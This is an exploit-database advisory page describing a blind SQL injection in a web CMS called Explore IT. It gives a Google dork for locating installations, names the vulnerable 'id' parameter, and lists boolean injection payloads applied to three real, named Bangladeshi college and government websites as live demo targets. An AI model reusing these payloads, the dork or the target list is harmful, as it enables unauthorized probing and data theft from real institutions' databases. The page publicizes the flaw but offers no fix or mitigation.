Explore IT CMS - Blind SQL Injection Vulnerability

2025.05.09
Credit: Mr_Amir_Typer
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: "Technical Assistance by: explore IT"

********************************************************* # Exploit Title: Explore IT CMS - Blind SQL Injection Vulnerability # Date: 2025-05-09 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: "Technical Assistance by: explore IT" # Category: WebApps # Tested On: Windows 11 + Firefox / Burp Suite ********************************************************* [+]: Vulnerable Parameter: `id` in URLs with `.php?id=` Append `' and 1=1--+` and `' and 1=2--+` to the URL and observe the difference in responses. ********************************************************* ### Demo 1: https://kachalonggovtcollege.edu.bd/page.php?id=2 → https://kachalonggovtcollege.edu.bd/page.php?id=2'+AND+1=1--+ → https://kachalonggovtcollege.edu.bd/page.php?id=2'+AND+1=2--+ ### Demo 2: https://www.rangamaticollege.gov.bd/page.php?id=13 → https://www.rangamaticollege.gov.bd/page.php?id=13'+AND+1=1--+ → https://www.rangamaticollege.gov.bd/page.php?id=13'+AND+1=2--+ ### Demo 3: https://www.cgsacollege.edu.bd/page.php?id=3 → https://www.cgsacollege.edu.bd/page.php?id=3'+AND+1=1--+ → https://www.cgsacollege.edu.bd/page.php?id=3'+AND+1=2--+ ********************************************************* [+] Google Dork: "Technical Assistance by: explore IT" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top